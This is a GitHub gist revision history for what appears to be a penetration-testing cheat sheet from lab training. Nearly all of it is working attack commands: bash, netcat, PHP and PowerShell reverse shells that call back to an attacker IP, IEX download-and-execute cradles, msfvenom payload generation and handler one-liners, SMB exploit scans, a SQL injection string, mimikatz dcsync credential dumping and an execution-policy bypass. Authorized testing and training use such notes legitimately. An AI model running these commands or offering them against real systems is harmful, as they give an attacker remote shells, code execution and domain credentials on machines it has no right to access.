-
-
Save dec0mrad3/96665ce505e8d4a4f0438c17271b2cee to your computer and use it in GitHub Desktop.
Revisions
-
ssstonebraker revised this gist
Jun 15, 2020 . 1 changed file with 0 additions and 170 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -862,176 +862,6 @@ Invoke-EnumerateLocalAdmin | Format-Table privilege::debug lsadump::dcsync /domain:corp.com /all /csv ``` # Powershell Unrestricted Executin Policy bypass ``` -
ssstonebraker revised this gist
Jun 11, 2020 . 1 changed file with 2 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -305,7 +305,7 @@ for host in $(cat ips.txt); do echo -e "---------\nhost:$host\n-----------";snm ## Priv escalation ### Reverse shell bash -i >& /dev/tcp/10.1.1.246/443 0>&1 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.114.137 443 >/tmp/f Add SSH keys: ssh-keygen -t rsa -b 2048 root.c: @@ -458,6 +458,7 @@ Windows You will not see a Linux prompt ``` <?php shell_exec("bash -i >& /dev/tcp/10.11.0.61/5555 0>&1") ?> <?php shell_exec("nc -e /bin/sh 10.11.0.61 5555") ?> <?php shell_exec("nc -e /bin/sh 10.11.0.61 5555") ?> <?php $sock=fsockopen("10.11.0.61",5555);exec("/bin/sh -i <&3 >&3 2>&3"); ?> -
ssstonebraker revised this gist
May 29, 2020 . 1 changed file with 4 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -3,7 +3,10 @@ ## Tools ## SQL Injection ``` ' or '1' ='1' -- ``` ## Website Directory Enumeration -
ssstonebraker revised this gist
May 17, 2020 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -160,7 +160,7 @@ nmap -sC -sS -p0-65535 sandbox.local --open -oG sandboxlocal.grep -oX sandboxloc //192.168.186.147 (commands - list, dir, mget * ) rpcclient -U "" 192.168.1.1 smbclient -U testuser //localhost/report-upload/ smbclient -N -L \\\\10.11.1.31 no password, hit <Enter> if logged try srvinfo enum4linux -v 192.168.152.109 -
ssstonebraker revised this gist
May 14, 2020 . 1 changed file with 2 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,7 +1,7 @@ # Discovery ## Tools ## Website Directory Enumeration @@ -10,6 +10,7 @@ ### Dirsearch This is a great tool ``` sudo dirsearch -u http://$IP/books -E -R 3 -x 403,301,302 --header "User-Agent: Googlebot-Image" --plain-text-report=dirsearch_10.11.1.123_scan.txt sudo dirsearch -u http://$IP/books -e php -R 3 -x 403,301,302 --plain-text-report=dirsearch_10.11.1.123_scan.txt ``` -
ssstonebraker revised this gist
May 14, 2020 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -6,12 +6,14 @@ ## Website Directory Enumeration ### Dirsearch This is a great tool ``` sudo dirsearch -u http://$IP/books -e php -R 3 -x 403,301,302 --plain-text-report=dirsearch_10.11.1.123_scan.txt ```  ### Opendoor This is a multithreaded python program to scan for files on web servers -
ssstonebraker revised this gist
May 14, 2020 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
LoadingSorry, something went wrong. Reload?Sorry, we cannot display this file.Sorry, this file is invalid so it cannot be displayed. -
ssstonebraker revised this gist
May 14, 2020 . 1 changed file with 6 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -6,6 +6,12 @@ ## Website Directory Enumeration ### Dirsearch This is a great tool ``` sudo dirsearch -u http://$IP/books -e php -R 3 -x 403,301,302 --plain-text-report=dirsearch_10.11.1.123_scan.txt ``` ### Opendoor This is a multithreaded python program to scan for files on web servers -
ssstonebraker revised this gist
May 14, 2020 . No changes.There are no files selected for viewing
-
ssstonebraker revised this gist
May 14, 2020 . 1 changed file with 9 additions and 4 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -413,6 +413,9 @@ msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.152 LPORT=40000 -f exe > $client = New-Object System.Net.Sockets.TCPClient("192.168.119.152",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` ``` powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.152:40000/Invoke-PowerShellTcp.ps1')" ``` ##### Kali Host ``` sudo nc -nlvp 4242 @@ -559,7 +562,7 @@ exploit ``` msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.152 LPORT=40000 -f exe > tpc_rev_40000.exe msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.21; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 40000; set AutoRunScript post/windows/manage/migrate; exploit" ``` ##### Widows reverse tcp 443 @@ -573,7 +576,7 @@ msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.222; set PAYLOAD win ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.152 LPORT=443 -f raw > shell.jsp msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.222; set PAYLOAD java/jsp_shell_reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; exploit" ``` ##### All at once - Reverse TCP @@ -823,9 +826,11 @@ set-executionpolicy unrestricted ``` ## Powerview ### Download and execute in memory ``` powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.152/powerview.ps1');Get-NetSession -ComputerName dc01 | Format-Table" powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.152:40000/Invoke-PowerShellTcp.ps1')" ``` ### See who is logged in to a domain controller ``` -
ssstonebraker revised this gist
May 10, 2020 . 1 changed file with 7 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -566,8 +566,14 @@ msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.14; set PAYLOAD wind ``` msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.152 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.222; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; set AutoRunScript post/windows/manage/migrate; exploit" ``` ##### JSP reverse tcp 443 ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.152 LPORT=443 -f raw > shell.jsp msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.222; set PAYLOAD set PAYLOAD java/jsp_shell_reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; exploit" ``` ##### All at once - Reverse TCP -
ssstonebraker revised this gist
May 10, 2020 . 1 changed file with 9 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -560,6 +560,15 @@ exploit msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.152 LPORT=40000 -f exe > tpc_rev_40000.exe msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.14; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 40000; set AutoRunScript post/windows/manage/migrate; exploit" ``` ##### Widows reverse tcp 443 ``` msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.152 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.220; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; set AutoRunScript post/windows/manage/migrate; exploit" ``` ##### All at once - Reverse TCP set RHOST to the IP of the host you are attacking -
ssstonebraker revised this gist
May 10, 2020 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -558,6 +558,8 @@ exploit ##### Windows reverse tcp exe 40000 ``` msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.152 LPORT=40000 -f exe > tpc_rev_40000.exe msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.14; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 40000; set AutoRunScript post/windows/manage/migrate; exploit" ``` ##### All at once - Reverse TCP set RHOST to the IP of the host you are attacking -
ssstonebraker revised this gist
May 10, 2020 . 1 changed file with 14 additions and 6 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -402,6 +402,10 @@ Kali nc -nv 192.168.152.10 4444 ### Reverse shell #### Windows msfvenom exe reverse ``` msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.152 LPORT=40000 -f exe > tpc_rev_40000.exe ``` #### Powershell Reverse Shell One Liner ##### Windows Host @@ -466,6 +470,7 @@ https://github.com/Yt1g3r/CVE-2018-8174_EXP Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe Mac msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho @@ -480,7 +485,7 @@ https://github.com/Yt1g3r/CVE-2018-8174_EXP cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.152 LPORT=4444 -f asp > shell.asp JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp @@ -550,11 +555,14 @@ set payload windows/meterpreter/reverse_tcp set lhost tun0 exploit ``` ##### Windows reverse tcp exe 40000 ``` msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.152 LPORT=40000 -f exe > tpc_rev_40000.exe ``` ##### All at once - Reverse TCP set RHOST to the IP of the host you are attacking ``` msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.14; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set AutoRunScript post/windows/manage/migrate; exploit" msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.13; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; set AutoRunScript post/windows/manage/migrate; exploit" @@ -605,22 +613,22 @@ nc -nv 192.168.152.10 4444 #### Generating the Payload ``` msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp LPORT=4444 EXITFUNC=thread -e x86/xor_dynamic -b "\x00\x09\x0a\x1a\x10" -f python msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp LPORT=4445 -e x86/shikata_ga_nai -b "\x00\x09\x0a\x1a\x10" -f python ``` #### Connect to Bind Shell from multi handler ##### Create exploit to run on windows box (creating bind shell) Replace Lhost with the windows box you are attacking ``` msfvenom -p windows/meterpreter/bind_tcp LHOST=10.11.1.14 LPORT=40000 -f exe > bind.exe ``` ##### Connect to the bind shell - Automatic Replace RHOST with the IP of the windows host you are attacking ``` msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.14; set PAYLOAD windows/meterpreter/bind_tcp; set rhost 10.11.1.14; set lport 40000; exploit" ``` ##### Connect to the bind shell - Manual -
ssstonebraker revised this gist
May 9, 2020 . 1 changed file with 9 additions and 5 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -148,15 +148,17 @@ nmap -sC -sS -p0-65535 sandbox.local --open -oG sandboxlocal.grep -oX sandboxloc ``` ## SMB (tcp 139, 445) enum: //192.168.186.147 (commands - list, dir, mget * ) rpcclient -U "" 192.168.1.1 smbclient -U testuser //localhost/report-upload/ smbclient -N -L \\\\ no password, hit <Enter> if logged try srvinfo enum4linux -v 192.168.152.109 nmap -p 139,445 --script smb-enum-users 192.168.1.0/24 nmap -p 135,139,445 --script smb-enum-shares 192.168.1.0/24 nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.11.1.201 nmap -p 135,139,445 --script smb-* --script-args=unsafe=1 -oX /root/mega/exploits/samba28 (made of 10.c) use exploit/linux/samba/trans2open (Unix Samba 2.2.0 to 2.2.8) @@ -552,13 +554,15 @@ exploit ##### All at once - Reverse TCP set RHOST to the IP of the host you are attacking ``` msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.13; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set AutoRunScript post/windows/manage/migrate; exploit" msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.13; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; set AutoRunScript post/windows/manage/migrate; exploit" ``` ##### All at once - Reverse HTTPS ``` msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.13; set PAYLOAD windows/meterpreter/reverse_https; set LHOST tun0; set LPORT 8443; set AutoRunScript post/windows/manage/migrate; exploit" ``` #### Auto Migrate Process @@ -609,14 +613,14 @@ msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp LPORT=4444 -e x86/s ##### Create exploit to run on windows box (creating bind shell) Replace Lhost with the windows box you are attacking ``` msfvenom -p windows/meterpreter/bind_tcp LHOST=10.11.1.13 LPORT=40000 -f exe > bind.exe ``` ##### Connect to the bind shell - Automatic Replace RHOST with the IP of the windows host you are attacking ``` msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.13; set PAYLOAD windows/meterpreter/bind_tcp; set rhost 10.11.1.13; set lport 40000; exploit" ``` ##### Connect to the bind shell - Manual -
ssstonebraker revised this gist
May 1, 2020 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -552,7 +552,7 @@ exploit ##### All at once - Reverse TCP set RHOST to the IP of the host you are attacking ``` msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.73; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set AutoRunScript post/windows/manage/migrate; exploit" ``` -
ssstonebraker revised this gist
May 1, 2020 . 1 changed file with 9 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -549,9 +549,16 @@ set lhost tun0 exploit ``` ##### All at once - Reverse TCP set RHOST to the IP of the host you are attacking ``` msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.73; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; exploit" ``` ##### All at once - Reverse HTTPS ``` msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.73; set PAYLOAD windows/meterpreter/reverse_https; set LHOST tun0; set LPORT 8443; set AutoRunScript post/windows/manage/migrate; exploit" ``` #### Auto Migrate Process -
ssstonebraker revised this gist
May 1, 2020 . 1 changed file with 5 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -554,7 +554,11 @@ All at once: msfconsole -x "use exploit/multi/handler; set RHOST 192.168.152.10; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; exploit" ``` #### Auto Migrate Process Before you run exploit run this ``` set AutoRunScript post/windows/manage/migrate ``` ### Windows Bind Shell #### Using C to create a bind shell on Windows -
ssstonebraker revised this gist
May 1, 2020 . 1 changed file with 15 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -594,6 +594,21 @@ msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp LPORT=4444 -e x86/s ``` #### Connect to Bind Shell from multi handler ##### Create exploit to run on windows box (creating bind shell) Replace Lhost with the windows box you are attacking ``` msfvenom -p windows/meterpreter/bind_tcp LHOST=10.11.1.73 LPORT=40000 -f exe > bind.exe ``` ##### Connect to the bind shell - Automatic Replace RHOST with the IP of the windows host you are attacking ``` msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.73; set PAYLOAD windows/meterpreter/bind_tcp; set rhost 10.11.1.73; set lport 40000; exploit" ``` ##### Connect to the bind shell - Manual ``` sudo service postgresql start sudo msfdb init -
ssstonebraker revised this gist
Apr 26, 2020 . 1 changed file with 6 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -131,7 +131,7 @@ You must prepend your commmand with proxychains. Be sure you don't sue the nmap ``` [kali@kali:~]$ proxychains nmap --top-ports=20 -sT -Pn 172.16.152.5 ``` ## nmap ### Scan Top 20 ports ``` @@ -142,6 +142,11 @@ nmap -sT -A --top-ports 20 192.168.1.0/24 --open -oG top-port.txt $ sudo nmap 192.168.152.44 -p- -sV -vv --open --reason -oX 192.168.152.44.xml ### Scan all ports with default set of scripts and SYNC for faster run time ``` nmap -sC -sS -p0-65535 sandbox.local --open -oG sandboxlocal.grep -oX sandboxlocal.xml ``` ## SMB (tcp 139, 445) enum: smbclient -L //192.168.186.147 (commands - list, dir, mget * ) rpcclient -U "" 192.168.1.1 -
ssstonebraker revised this gist
Apr 17, 2020 . 1 changed file with 6 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -3,6 +3,7 @@ ## Tools https://github.com/frizb/Vanquish ## Website Directory Enumeration ### Opendoor @@ -86,6 +87,11 @@ This is a multithreaded python program to scan for files on web servers nmap --script=dns-zone-transfer -p 53 ns2.megacorpone.com dnsenum theharvester -d cisco.com -b google >google.txt -Email harvest from google.com ## Crackmap Exec cme This will return all windows hosts running smb and their window version + their domain (very quickly) ``` cme smb 10.11.1.0/24 ``` ## Nmap ### Subnet scan with exlusion -
ssstonebraker revised this gist
Apr 16, 2020 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -955,6 +955,8 @@ set-executionpolicy unrestricted ``` # Metasploit Meterpreter cheat sheet: https://www.blueliv.com/downloads/Meterpreter_cheat_sheet_v0.1.pdf ## Nmap Scanning ``` -
ssstonebraker revised this gist
Apr 16, 2020 . 1 changed file with 12 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -956,13 +956,24 @@ set-executionpolicy unrestricted # Metasploit ## Nmap Scanning ``` db_nmap 10.11.1.8 -A -Pn ``` ## Payload Types  ## Searching ### modules msf5 > search smb type:auxiliary ### Payloads ``` search meterpreter type:payload ``` ## Cheatsheet   -
ssstonebraker revised this gist
Apr 16, 2020 . 1 changed file with 9 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -954,7 +954,15 @@ lsadump::dcsync /domain:corp.com /all /csv set-executionpolicy unrestricted ``` # Metasploit ## Payload Types  ## Searching modules msf5 > search smb type:auxiliary ## Cheatsheet   -
ssstonebraker revised this gist
Apr 16, 2020 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
LoadingSorry, something went wrong. Reload?Sorry, we cannot display this file.Sorry, this file is invalid so it cannot be displayed. -
ssstonebraker revised this gist
Apr 16, 2020 . 1 changed file with 6 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -952,4 +952,9 @@ lsadump::dcsync /domain:corp.com /all /csv # Powershell Unrestricted Executin Policy bypass ``` set-executionpolicy unrestricted ``` # Metasploit Cheatsheet   -
ssstonebraker revised this gist
Apr 16, 2020 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
LoadingSorry, something went wrong. Reload?Sorry, we cannot display this file.Sorry, this file is invalid so it cannot be displayed. -
ssstonebraker revised this gist
Apr 16, 2020 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
LoadingSorry, something went wrong. Reload?Sorry, we cannot display this file.Sorry, this file is invalid so it cannot be displayed. -
ssstonebraker revised this gist
Apr 15, 2020 . 1 changed file with 5 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -948,3 +948,8 @@ lsadump::dcsync /domain:corp.com /all /csv Test for Web Storage SQL injection Check CORS implementation Check Offline Web Application # Powershell Unrestricted Executin Policy bypass ``` set-executionpolicy unrestricted ``` -
ssstonebraker revised this gist
Apr 14, 2020 . 1 changed file with 5 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -750,7 +750,11 @@ cmd /c echo y | plink.exe -batch -ssh -l kali -pw kali -R 192.168.119.152:1235:1 ``` # AD Enumeration ## Powershell Notes Execution Policy Unrestricted ``` set-executionpolicy unrestricted ``` ## Powerview ### Download ane execute in memory
NewerOlder